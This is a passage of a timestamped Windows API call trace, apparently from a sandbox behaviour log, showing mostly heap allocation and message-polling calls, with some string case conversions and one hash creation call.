| out: lpMsg=0x8bf250) returned 0 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.321] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.321] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.321] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.322] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.322] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.322] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.322] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.322] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.322] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.322] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.325] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.325] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0208.325] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0208.326] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0208.326] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.326] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0208.326] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.326] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.326] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.326] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.327] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.327] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.327] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.327] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.327] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.328] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.328] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.328] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.328] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.328] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.328] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.328] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.329] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.329] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0208.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.330] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.330] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.331] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.331] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.332] CryptCreateHash (in: hProv=0xad2720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0208.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.334] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0208.334] RtlAllocateHeap 